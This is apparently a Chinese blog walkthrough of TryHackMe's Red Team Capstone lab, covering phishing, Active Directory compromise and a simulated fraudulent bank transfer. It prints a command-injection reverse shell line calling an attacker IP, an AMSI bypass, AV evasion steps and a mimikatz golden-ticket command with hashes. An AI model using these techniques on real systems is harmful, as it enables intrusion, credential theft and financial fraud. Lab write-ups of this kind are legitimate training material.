TryHackMe-Red Team Capstone Challenge (红队挑战)【真实红队模拟】

Red Team Capstone Challenge

TryHackMe

注意:我不会在这里提及相关的flag,只专心打;flag可以自己用各个hostname尝试一遍

挑战作者的一句话

这个房间被评为坚硬,但因为它是你前面的一座山,它可能被评为疯狂。但是,当您将其分解为必须实现的妥协的各个阶段时,这些阶段中没有一个实际上很难;他们只需要关注细节并合理地应用您应该通过红队学习途径学到的知识。正常的红队交战持续数周,有时甚至数月。在应对挑战时考虑到这一点。

创建此网络是为了模拟您在红队期间通常会在真实客户参与中发现的内容。此挑战中的任何攻击路径都不是作为虚构的 CTF 创建的。相反,您会发现我在交战中亲自看到的错误配置和漏洞。但是,您还将面临我不得不面对的真正挑战,某些工具或技术根本无法开箱即用,或者必须使用独创性来使某些东西以您想要的方式运行。同样,在实际参与中,答案永远不会拿起电话告诉客户“我不能妥协这个主机,因为我使用的工具显示 XYZ 错误”。这根本不会削减它。答案是启动调试过程,尝试了解不同之处,并利用这些知识进行调整,以便仍然能够执行攻击。

当你攀登这座山时,我的一些建议 - 首先,确保正确阅读所提供的信息。此信息旨在帮助您避免将其作为 CTF 进行尝试,这可能会导致挫败感。其次,这一挑战在每个阶段都有多重妥协。如果您坚持尝试使特定攻击起作用,我的建议是执行其他枚举以尝试发现其他攻击路径。找到你自己的黄金路径来完成一次挑战,然后返回并尝试征服其他攻击路径。

最重要的是要记住征服这个顶点挑战

  • 这是红队的练习,而不是夺旗游戏。仅凭您的 CTF 技能不足以完成挑战。
  • 该练习测试您在红队学习路径中学到的技能。我们建议在尝试挑战之前至少完成此路径的 80%。如果您遇到困难,请返回路径,因为它涵盖了您需要的技术。
  • 有不同的方法可以完成此练习。如果您在特定攻击中遇到问题,请尝试不同的方法和途径。
  • 仔细阅读任务2“项目简介”,因为它包含完成挑战所需的关键信息。

网络拓扑

在这里插入图片描述

项目概述

网络安全咨询公司TryHackMe已与Trimento政府接洽,要求对他们的储备银行(TheReserve)进行红队交战。 Trimento是一个位于太平洋的岛国。虽然它们的规模可能很小,但由于外国投资,它们绝不是不富裕的。他们的储备银行有两个主要部门:

  • 公司 - Trimento储备银行允许外国投资,因此他们有一个部门负责该国的企业银行客户。
  • 银行 - Trimento储备银行负责该国的核心银行系统,该系统与世界各地的其他银行相连。

logo:

在这里插入图片描述

Trimento政府表示,评估将涵盖整个储备银行,包括其周边和内部网络。他们担心,企业分工在促进经济的同时,由于隔离不足,可能会危及核心银行体系。这种红队参与的结果将决定是否应该将公司部门分拆成自己的公司。

此评估的目的是评估公司部门是否可以受到损害,如果是,则确定它是否会损害银行部门。必须执行模拟的欺诈性汇款以充分证明妥协。

为了安全地执行此操作,TheReserve将为您创建两个新的核心银行账户。您需要证明可以在这两个帐户之间转移资金。唯一可行的方法是访问核心后端银行系统SWIFT。

注意:SWIFT(全球银行间金融电信协会)是银行用于后端转账的实际系统。在此评估中,已创建一个核心后端系统。但是,出于安全原因,在此过程中引入了故意的不准确之处。如果您想了解有关实际 SWIFT 及其安全性的更多信息,请随时进行一些研究!换句话说,这里下面的信息是编造的。

为了帮助您了解项目目标,Trimento政府分享了一些有关SWIFT后端系统的信息。SWIFT 在访问受限的隔离安全环境中运行。虽然不应轻易使用不可能这个词,但实际托管基础架构受损的可能性非常小,可以公平地说,不可能破坏此基础架构。

但是,SWIFT 后端在 http://swift.bank.thereserve.loc/ 处公开了一个内部 Web 应用程序,TheReserve 使用它来促进传输。政府提供了转移的一般程序。要转移资金:

  1. 客户要求转移资金并收到转移代码。
  2. 客户联系银行并提供此转账代码。
  3. 具有捕获者角色的员工向 SWIFT 应用程序进行身份验证并捕获传输。
  4. 具有审批者角色的员工查看转移详细信息,如果经过验证,则批准转移。这必须从跳转主机执行。
  5. 一旦 SWIFT 网络收到转账批准,转账就会得到便利,并通知客户。

项目范围

本节详细介绍了项目范围。

范围内

  1. 对TheReserve的内部和外部网络进行安全测试,包括通过VPN连接访问的所有IP范围。
  2. TheReserve公司网站的OSINTing,该网站在TheReserve的外部网络上公开。请注意,这意味着所有 OSINT 活动都应限制在提供的网络子网中,并且不需要外部互联网 OSINTing。
  3. 对TheReserve的任何员工的网络钓鱼。
  4. 攻击 WebMail 主机上 TheReserve 员工的邮箱 (.11)。
  5. 使用任何攻击方法完成在提供的帐户之间执行交易的目标。

超出范围

  1. 对未托管在网络上的任何站点进行安全测试。
  2. 对TryHackMe VPN(.250)和评分服务器进行安全测试,或试图攻击连接到网络的任何其他用户。
  3. 在 WebMail 服务器 (.11) 上进行的任何更改邮件服务器配置或其底层基础结构的安全测试。
  4. 攻击网络邮件门户上其他红队成员的邮箱(.11)。
  5. 外部(互联网)OSINT聚会。
  6. 攻击所提供子网范围之外的任何主机。完成以下问题后,您的子网将显示在网络图中。此 10.200.X.0/24 网络是应对此挑战的唯一范围内网络。
  7. 进行 DoS 攻击或任何使其他用户无法运行网络的攻击。

在开始之前,请确保您了解以下几点。如果有任何不清楚的地方,请重新阅读此任务。

  1. 此评估的目的是评估公司部门是否可以受到损害,如果是,则确定它是否会导致银行部门的损害。
  2. 为了证明这种危害,必须通过访问 SWIFT 核心后端银行系统来执行模拟欺诈性汇款。
  3. SWIFT 后端基础设施是安全的,但公开了 TheReserve 用于促进传输的内部 Web 应用程序。
  4. 调动的一般流程涉及职责分离,以确保一名员工无法同时捕获和批准同一调动。
  5. 已为您提供了一些信息和工具,您可能会发现这些信息和工具在练习中很有用,包括密码策略,但您可以自由使用自己的信息和工具。
  6. 有一些规则可以确定允许您和不允许做什么。不遵守这些规则可能会导致被禁止参加挑战。
  7. 获得网络访问权限后,您需要使用提供的SSH详细信息通过电子公民通信门户注册挑战。
  8. 您需要通过在已入侵的主机上执行特定步骤来证明已泄露。这些步骤将通过电子公民门户提供给您。

外围信息收集

网络拓扑更新

在这里插入图片描述

TheReserve网站

端口扫描

在这里插入图片描述

Web信息收集

进入80端口是TheReserve银行的主页

从title中得知,这是October CMS,版本号未知

在这里插入图片描述

TheReserve银行团队信息

从该网站上我们可以获得有关银行团队的信息

  • 银行主管 Brenda Henderson (女)
  • 副主任 Leslie Morley(女) 和 Martin Savage(男)
  • 企业高管 CEO (Paula)(女), CIO (Christopher)(男), CTO (Antony)(男), CMO (Charlene)(女), and COO (Rhys)(男)
  • 助理 Lynda(女)
  • 项目经理 Roy(男)

这里的名字不完整,在这些人员照片的目录下,我们可以获得更多、更完整的

在这里插入图片描述

在这里插入图片描述

邮箱:applications@corp.thereserve.loc

以此推测用户的邮箱是username@corp.thereserve.loc

目录扫描

上gobuster

在这里插入图片描述

searchsploit存在一些漏洞, 但似乎暂无法利用

在这里插入图片描述

mail服务器

端口扫描

在这里插入图片描述

开了不少端口

在这里插入图片描述

80端口是iis,但似乎没有任何东西

它是邮件服务器,所以开了110端口,但我们目前暂时没有任何有效凭据,尝试smb爆破太过缓慢,不考虑

OpenVpn服务器

扫一下12的vpn服务器

在这里插入图片描述

Web信息收集

80端口是一个登录页面

在这里插入图片描述

这里可以尝试使用刚刚获得的用户名进行爆破

我们已经得知了密码策略,可以用john自定义规则生成一些密码

在这里插入图片描述

尝试hydra爆破,失败

在这里插入图片描述

目录扫描

gobuster扫

在这里插入图片描述

获得一个openvpn文件

在这里插入图片描述

将其下载,将服务器ip改成当前的openvpn服务器

在这里插入图片描述

直接连接,注意:可能会一直刷重连,不过似乎不影响

在这里插入图片描述

经过多次主机存活扫描,里面除了vpn服务器和自己,一台机器都没有

VPN服务器Getshell

后来查看油管大佬的视频后发现vpn站点竟是使用邮箱登录的

在这里插入图片描述

登录进去

在这里插入图片描述

这里可以请求ovpn文件,我通过filename参数的意思,我从sql注入联想到命令注入,有后缀,并且无回显

使用反引号,尝试nc拼一把运气回连攻击机,竟然成功

在这里插入图片描述

直接老方法getshell

?filename=`mkfifo+/tmp/f1%3bnc+10.50.116.23+443+<+/tmp/f1+|+/bin/bash+>+/tmp/f1`

在这里插入图片描述

权限提升 - cp

查看sudo -l

在这里插入图片描述

很简单的提取方法,直接覆盖passwd

在这里插入图片描述

持久化

先加固shell

在这里插入图片描述

编辑ssh配置文件,允许密码登录

在这里插入图片描述

创建一个ssh账户,并将自己加入sudo组,方便后续行动

在这里插入图片描述

1q2w3e4r!@#$
usermod -a -G sudo hackerMM

sshuttle搭建隧道

在这里插入图片描述

针对银行团队开展 网络钓鱼行动

到e-citizen注册电子邮箱

在这里插入图片描述

如您所见,我们已经购买了一个用于域名抢注的域名,用于钓鱼。
发现网络邮件服务器后,您可以使用这些详细信息来验证并从您的邮箱中恢复其他项目信息。
一旦您执行了破坏网络的操作,请向 e-Citizen 进行身份验证,以便向政府提供更新。 如果您的更新足够,您将获得一面旗帜以指示进度。

设置gophish

我不会在这里提及如何设置gophish,因为THM已经教过,只记录必要的

在这里为了令我们的钓鱼网站更加真实,我选择套用他们银行vpn登录页面

在这里插入图片描述

勾选捕获密码

将钓鱼邮件模板和钓鱼页面设置好后,添加目标邮箱,我们已经获得目标团队的username,并且邮箱也可以猜测出来

在这里插入图片描述

添加活动

在这里插入图片描述

在这里插入图片描述

鱼叉式网络钓鱼

查看邮箱发现部分人回复只处理内部事情,不处理外部事宜

但其中一封邮件给我们指向了另一个方向:

在这里插入图片描述

再会,

谢谢您的来信。 但是,它似乎与我的业务部门无关。 请将您的问题提交给正确的 BU。

问候,
艾米莉·哈维

我猜测它会处理我们的信件,但前提是邮件内容她会感兴趣

我们在此回到银行的网站上,发现她和第一位女士会处理外部发来的信件

在这里插入图片描述

我想我们需要进行鱼叉式网络钓鱼,专门针对她两开展

我尝试通过chatgpt生成有关话题的邮件模板

在这里插入图片描述

但很遗憾,这个邮件发过去后,经理并没有回复我们,也没有点击链接,暗羽喵大佬建议尝试VBA宏

我尝试了msf生成VBA payload,依然没有回复邮件,猜测是因为被防火墙拦截了。

LNK劫持

尝试lnk劫持,利用mslink

在这里插入图片描述

发送邮件

在这里插入图片描述

开启smbserver,成功访问了过来

在这里插入图片描述

这里证明我们的VBA应该也成功了,但是没连接过来,目前我们可以确认

我尝试直接用msf生成反向shell payload,但没连接过来,应该是有WinDefender

尝试直接ntlm中继

在这里插入图片描述

失败

WinDefender C#免杀

尝试上次利用THM教导的免杀知识自己做的简单免杀,成功getshell

在这里插入图片描述

登录.250主机的ssh,获取flag1

在这里插入图片描述

由于shellcode是msf生成的,运行时执行命令依然会被杀,这里可以直接生成一个新进程规避WinDefender的内存检测,直接powershell或cmd

在这里插入图片描述

这样就不会再在运行时被检测到了

由于有AV的存在,我们无法随意使用WinPEAS和sharphound,这里可以使用SharpHound的powershell脚本,再去bypass AMSI

$a = [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils')
$b = $a.GetField('ams'+'iInitFailed','NonPublic,Static')
$b.SetValue($null,$true)

分段绕过

在这里插入图片描述




内网信息收集

内网存活主机、端口信息收集

在vpn服务器上

由于nmap扫描流量不走sshuttle隧道,这里只好传个nmap二进制可执行文件过去,在服务器上扫,收集内网主机存活

在这里插入图片描述

CORP子域 - 域信息收集 - SharpHound Bypass

在WRK1上

绕过AMSI后发现又会被WinDefender杀掉,这里只好考虑对SharpHound做混淆

https://github.com/Flangvik/ObfuscatedSharpCollection

这个项目包含许多可执行文件的混淆版本,这里的经过混淆的sharphound能够使用

在这里插入图片描述

收集域信息

在这里插入图片描述

攻击机开启smbserver后回传数据包,等待下一步利用

WinPEAS WRK1本地信息收集

上winPEAS,提取到WRK1\Administrator的密码,等待下一步利用

在这里插入图片描述

CORP子域 - 初步AD域枚举

我们目前拥有两组凭据,以及一个WRK1/Administrator的明文密码(未知是否有效)

可以尝试常规的攻击方式

Kerberoasting

直接上impacket

在这里插入图片描述

直接上hashcat

在这里插入图片描述

只得到了svcScanning的账户密码,不过也足矣

在这里插入图片描述

分析

SVCBACKUPS组允许通过登录到server1和server2,并且可以通过server的机器账户修改DC BACKUPS的GPO

在这里插入图片描述

CORP子域 - AD横向移动 - SERVER1/SERVER2

SERVER1

有了凭据和信息,我们直接evil-winrm等server1和server2

在这里插入图片描述

查看whoami发现我们属于administrators组

在这里插入图片描述

进rdp把杀毒关了

在这里插入图片描述

mimikatz简单找了一波没找到啥

下来用impacket的secretsdump获得了svcBackups的明文密码

在这里插入图片描述

CORP子域 - AD利用

DC

根据以往的经验,这种账户应该有权限转储ntds.dit

在这里插入图片描述

拿着nt hash直接登

在这里插入图片描述

注意:如果想要拿flag4的话可以直接拿着DA组的hash用xfreerdp进行pth登录,当然也可以自己添加给账户

简单域持久

直接向DA组添加账户

在这里插入图片描述

顺便把WinDefender关了

在这里插入图片描述

网络拓扑更新

在这里插入图片描述




接管父域 - 域间移动

Inter-Realm TGT - 域间金票

通过双向信任,接管父域

用AD-RSAT的cmdlet获取到corp子域DC的sid、EA组的sid

krbtgt在前面DCsync的时候已经获取了,直接开始做金票

mimikatz # kerberos::golden /user:Administrator /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt

在这里插入图片描述

也可以用/export导出kirbi tgt文件保存到攻击机

验证tgt是否有效

在这里插入图片描述

移动到RootDC

这里psexec过去rootDC

在这里插入图片描述

由于我们当前是corp\Administrator登录过去的,所以尝试在RootDC上添加自己的账户的时候会失败

但我们有权,可以直接修改thereserve.loc\Administrator的密码

在这里插入图片描述

然后从corpDC登录thereserve.loc\Administrator然后通过psexec登rootDC

添加EA组后门账户

在这里插入图片描述

注意, bank子域与corp子域应该是没有信任关系的,这就意味着我们无法直接从corp子域访问到bank子域

但我们可以利用子域与父域的双向信任。我们可以先从corpDC登录到RootDC,再从RootDC访问到Bank子域

另外,我们还需要在bank子域下单独创建一个账户并赋予DA组权限

至此,我们已经掌控整个域,拥有所有域的完全控制权




银行转账

反向ssh

JMP机器是可以直接与我们攻击机互通的,这里直接用ssh反向连接到攻击机做代理

在这里插入图片描述

配置浏览器代理插件

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

我们到.250机器上将会获得一个银行账户,用其进行登录

向指定的账户转账1000万

在这里插入图片描述


在检索的时候,无意发现一个py脚本,里面存在一组凭据,这就是银行转账审批者的账户

在这里插入图片描述

查看该用户所在的组,可以猜到这个组应该就是负责最终批钱的

在这里插入图片描述


顺着用户组,找到了另一个组,该组应该就是负责初步审核的

在这里插入图片描述


在.61机器下,有两个PA组账户在这里登录过

那么PC组也能或者说最有可能在WORK1和WORK2下活动

登录到WORK1,发现这里果然有PC组的账户登录

在这里插入图片描述

直接改密码

在这里插入图片描述

rdp登录过去

在这里插入图片描述

虽然Chrome里啥也没有,但是该用户的家目录下有个文件,里面记录的应该就是他的网站登录密码

在这里插入图片描述

用这凭据成功登录

在这里插入图片描述

进后台把自己的转账申请同意

在这里插入图片描述

退出登录,回到r.davies账户,同意转账

在这里插入图片描述

最终转账

这是最后的检查! 如果您还没有完成所有其他标志,请不要尝试此操作。
完成后,请按照下列步骤操作:

  1. 使用您的 DESTINATION 凭据,向 SWIFT 进行身份验证
  2. 使用 SWIFT 访问标志电子邮件中提供的 PIN,验证交易。
  3. 使用您的捕获器访问权限,捕获已验证的交易。
  4. 使用您的批准者访问权限,批准捕获的交易。
  5. 利润?

一旦您批准了所提供的交易,请输入 Y 以验证您的访问权限。

这个跟前面的操作一致,仅仅只是多了一步PIN码确认,这里我就不再重复论述了

这里值得注意的是不要重新创建转账请求,而是对着原来1000万的那个进行PIN码确认

拓扑更新

在这里插入图片描述

结束

这个红队挑战是我在thm学习这么久打的最棒的挑战,它确实是几乎考察了红队路径7-80%的考点,其实回头看整个挑战,其实并没有什么难点,只要认认真真在THM学,根本就毫无难度,这个挑战可以作为考察自己红队路径有没有学及格,仅此而已

这次红队挑战对我来说也是第一次,完成这个挑战,对我来说也意味着我也差不多适合前往htb了,我在TryHackMe学习了截至目前173天,我从零学到现在,只有我自己知道我学了多少东西,所以这才是我真正热爱thm的原因,但我也要往更高处走了,步入大佬们的后尘,感谢TryHackMe

在这里插入图片描述文章来源地址https://uudwc.com/A/wk1w

原文地址:https://blog.csdn.net/qq_54704239/article/details/130647635

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请联系站长进行投诉反馈,一经查实,立即删除!

h
上一篇 2023年06月17日 06:38
循环神经网络RNN用于分类任务
下一篇 2023年06月17日 06:38